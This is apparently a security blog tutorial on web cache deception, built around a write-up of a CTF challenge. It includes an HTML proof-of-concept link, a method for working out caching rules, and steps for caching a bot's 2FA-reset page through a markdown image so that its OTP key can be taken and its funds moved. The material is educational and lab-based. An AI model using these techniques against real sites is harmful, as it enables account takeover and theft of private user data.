Web Cache Deception attacks

Do you have vulnerabilities that you just love to exploit? I know I have a few and one of them is web cache deception. Is not so common to encounter this vulnerability, but better be ready when you do. In this article we’ll look into its details by using a CTF challenge as demo application.

1. General concepts

This is a vulnerability specific to web applications and can occur when the next two conditions are met:

  • A caching server/component between client and web application that will cache responses based on one or more criteria
  • An endpoint within the web application that will perform partial/regex matching on routes

To make the second condition clearer, let’s take an example: when the client makes a request to /profile/non-existing-route, the web application will match the requested route to /profile instead of returning a 404 error message.

Now, let’s describe the whole flow assuming both conditions are present. The user X makes a request to /my-profile/main.css. The web server matches the requested path to /my-profile/ and generates the corresponding response. However, the caching server detects that the route requested ends with .css and decides to cache the response without checking if the response’s content is indeed CSS. Now, if anyone requests the route /my-profile/main.css will, in fact, get the same response that the user X received.

If things are not clear yet, just bear with me till the end.

2. Particularities

The impact of this vulnerability can vary depending on what endpoints are vulnerable. Typically, the caching servers will cache only GET and HEAD methods. Taking into account that most modern applications are not using these methods for modifying data or sensitive operations, it would not be possible to get the cached login response, for example.

Another thing is that we must force the victim to perform the initial request and that would, most of the times, mean that we’ll rely on the HTTP GET method. So, we’re mostly limited to access unauthorized data that is returned from GET requests. It may sound bad, but is actually more than enough.

Think about all the data that is returned using GET requests. It might be the user’s personal information, a dashboard with all application’s users or even credit card information.

Before discussing how we can launch this attack against an application’s legitimate user, let’s take a closer look at how the vulnerability is executed using the below diagram.

Let’s assume we have a way to force the admin user to perform a request to /all-users/main.css using its session. The request will pass through the caching server, where a caching rule for CSS files will be triggered. Now, the caching server will pass the request to the web server, but it will also wait for its response in order to cache it. The web server matches the requested path to the endpoint /all-users and computes the necessary data for it. Once done, it sends the response to the caching server, here the response will be cached and passed forward to the admin user.

As attackers, the only thing we have to do now is to make a request to the cached path: /all-users/main.css. The caching server will return the same response the admin got since it got it cached. What’s nice is that we don’t even need to be authenticated. Even more, our request is not even passed to the web server, so the only component that will know we accessed that response would be the caching server which might not have logging configured.

The execution of a web cache deception attack

What have we accessed? Well, let’s assume that the response contained a paginated list of 10-25 users with their email addresses and other PII (personal identifiable information). This would enable us to perform password attacks against the identified accounts or will let an attacker to target the application’s users with spear phishing emails.

3. Attack delivery

How will you force another user to make the initial GET request? Let’s go through some options.

For making this more practical, we’ll use the application from the section 5 which is a challenge from HTB Cyber Apocalypse 2022 CTF called Genesis Wallet’s Revenge. As a short introduction, we challenge required us to bypass the 2FA of another account controlled by a bot. This can be done by making the bot visit the /reset-2fa endpoint so that it will be cached. Next, we can access the cached response and configure its 2FA on our end.

3.1 Cross-Domain Client-Side Request Forgery (CSRF)

Send the victim a phishing email or trick him in any way to click the malicious URL.

Here’s a quick PoC in HTML:

<!DOCTYPE html>
<html>
<head></head>
<body>
    <h2>PoC</h2>
    <a href="http://localhost:1337/en/reset-2fa/main.css">Click me</a>
</body>
</html>

For the sake of it, we hosted the webpage in an EC2 instance to better mimic an attack over the internet using different domains.

The next screenshot shows how, once the link was clicked, the browser adds the cookies in the request. This will result in the caching of the response under the session of the user that clicked the link.

Cookies added when user clicks link

However, this can’t be done if the cookie has the flag SameSite set to Strict. However, if the SameSite flag is set to None, then we can use an image tag to perform the request, which would be great since the request will be made automatically when the HTML will be rendered.

This will also not work if the target configured its browser so that it will block third-party cookies.

3.2 CSRF under the same domain

Here we can launch the attack without requiring user interaction. However, the web application must be vulnerable to something that would lead to a CSRF, such as XSS, HTML Injection, Open redirect etc.

In some cases, as we’ll see in the demo section, a built-in feature can be enough for launching a CSRF attack and cache a sensitive page.

4. Reverse engineer the caching rules

You identified a web application as being vulnerable, but you did it by, first, accessing /my-profile/main.css from your session and second, accessing the cached response from a incognito window without a session.

Is the application indeed vulnerable? What if the response is cached based on the client’s IP? This means that you can conduct the attack only if you have the same IP as your target.

Knowing the caching rules can help you to better asses the risk of the vulnerability and its likelihood of being exploited. As well, it will help you in creating a PoC or attack vector.

Here is a list of what rules are most important to determine:

  1. Is caching based on IP?
    • Make the same request and try to access its cached version from another external IP
    • If the attack can’t be performed over the internet, then the risk is highly reduced
  2. What extensions trigger the caching rule?
    • Check if the caching is triggered for common extensions like .css, .js, .ico, .png etc.
    • This will help you determine what your options are and in some cases it might help you bypass various restrictions when launching the attack
  3. Is the caching based on one/more HTTP headers?
    • Caching servers can be configured to map the cached responses with the value from an HTTP header
    • If that header is not present, the configuration can contain one backup HTTP header and so on
    • Remove one header at a time and see if you still get the cached response
    • If you don’t, cache the response for another route, but without sending the previously identified header
    • Repeat this until you can’t exploit the vulnerability anymore
    • This will give you a list of the headers used for mapping the cached response
    • Is important to send the same header as the target in order to get its response
  4. For how long is the response cached?
    • You might get this information from the response’s headers
    • If you don’t, cache a response and access it at various time intervals
    • The smaller the time interval, the smaller the risk

4.1 Using the information

How to use this information? Depends on your context, but here is an example:

  • The web cache deception can be exploited over the internet
  • Only the .css extension triggers the caching
  • The caching is mapped based on User-Agent HTTP header
  • The response is cached for 5 minutes
  • And let’s say that we can force another user to make the initial request via an HTML Injection vulnerability

We can inject an HTML payload with two image tags. One it will be to the target endpoint that we want to cache, followed by /main.css, and the other one it will be to an endpoint we control.

We’ll set a listener to the endpoint we control so that we will know when it was accessed. Since we only have 5 minutes, we must automate the process. On this listener, we’ll start a script that will try to request the target endpoint followed by /main.css with various user agents until we guess the one used by our target user. Once found, we save the content for further examination.

5. Demo

For this, we will use the provided source of the challenge Genesis Wallet’s Revenge from HTB Cyber Apocalypse 2022. This will be just a short write-up, focused on the exploitation of a web cache deception vulnerability. For more details, check the task’s write-ups from CTF Time.

The challenge involves a web application where you can perform transactions involving a custom currency. If we have over 1337 of this currency and we are not the bot, we get the flag. The challenge description gives us the credentials used by the bot, but we need 2FA in order to login or perform transactions. One important detail is that the bot checks the transactions once we make one.

So, we need to bypass the bot’s 2FA in order to login into its account and send us its balance. Looking at the provided source code, we can notice a configuration for a Varnish caching server.

vcl 4.1;

backend default {
    .host = "127.0.0.1";
    .port = "1337";
}

sub vcl_hash {
    hash_data(req.url);

    if (req.http.host) {
        hash_data(req.http.host);
    } else {
        hash_data(server.ip);
    }

    return (lookup);
}

sub vcl_recv {
    # Only allow caching for GET and HEAD requests
    if (req.method != "GET" && req.method != "HEAD") {
        return (pass);
    }
    # get javascript and css from cache
    if (req.url ~ "(\.(js|css|map)$|\.(js|css)\?version|\.(js|css)\?t)") {
        return (hash);
    }
    # get images from cache
    if (req.url ~ "\.(svg|ico|jpg|jpeg|gif|png)$") {
        return (hash);
    }
    # get fonts from cache
    if (req.url ~ "\.(otf|ttf|woff|woff2)$") {
        return (hash);
    }
    # get everything else from backend
    return(pass);
}

sub vcl_backend_response {
    set beresp.ttl = 120s;
}

sub vcl_deliver {
    if (obj.hits > 0) {
        set resp.http.X-Cache = "HIT";
    } else {
        set resp.http.X-Cache = "MISS";
    }

    set resp.http.X-Cache-Hits = obj.hits;
}

Reading the configuration file we can see that:

  • It forwards the requests to a back-end server running at 127.0.0.1:1337
  • The cached responses are mapped based on the Host HTTP header (or the server’s IP if this header is not present)
  • It caches responses from GET or HEAD HTTP requests
  • It caches based on multiple extensions: css, js, map, png, ico, ttf, woff etc.
  • The responses are cached for 2 minutes
  • If the “X-Cache” HTTP header within the response has the value “HIT” it means we got a cached response (and “MISS” if the response is not a cached one)

Remember the requirements for this vulnerability? One was to have a caching server (checked) and the second one was to have endpoints with partial matching of their route. Looking through the source code we can identify the next endpoints that satisfy this condition:

router.get(/^\/(\w{2})?\/?(setup|reset)-2fa/, AuthMiddleware, async (req, res) => { ...

router.get(/^\/(\w{2})?\/?2fa/, AuthMiddleware, (req, res) => { ...

router.get(/^\/(\w{2})?\/?dashboard/, AuthMiddleware, async (req, res) => { ...

router.get(/^\/(\w{2})?\/?transactions/, AuthMiddleware, async (req, res) => { ...

router.get(/^\/(\w{2})?\/?settings/, AuthMiddleware, async (req, res) => { ...

For solving the challenge, we’ll focus on the first endpoint which can be used to get a new OTP key for configuring the 2FA.

One more thing now. We need a CSRF vulnerability so that the bot visits our malicious link. For this we’ll abuse a built-in functionality that let us to send a note along with a transaction. This note can contain markdown, including images. This will be our injection point for forcing the bot to make target request.

Make transaction with CSRF payload

Once we validate the 2FA for this transaction, the balance will be updated, the bot will check the transaction and, once the markdown is rendered, a request using the bot’s session will be made to the route http://127.0.0.1/en/reset-2fa/main33.css.

Now, the only thing left to do for us is to make a request to the route /en/rest-2fa/main33.css with the Host header set to 127.0.0.1. At this point, the caching server will return the cached response given to the bot which is containing the OTP key required for configuring 2FA.

For completing the challenge we must configure the 2FA, login into the bot’s account and transfer its funds into our account.

This challenge is a very good example of how by exploiting a vulnerability that affects the confidentiality of the system can lead, in fact, to a breach of integrity (by transferring the funds) and availability (by changing the user’s 2FA and blocking the access in its account).

6. Final thoughts

Web cache deception requires a few conditions in order to be exploitable and it might not be so common, but it can lead to serious security issues.

It all comes down to what endpoint is vulnerable, what can be exfiltrated from it in order to be used in other attack vectors and what the caching rules are.

I hope you now have an idea about what this vulnerability is, what do you need to exploit it, how to reverse engineer the caching rules and to what the vulnerability can lead when exploited.

Leave a Reply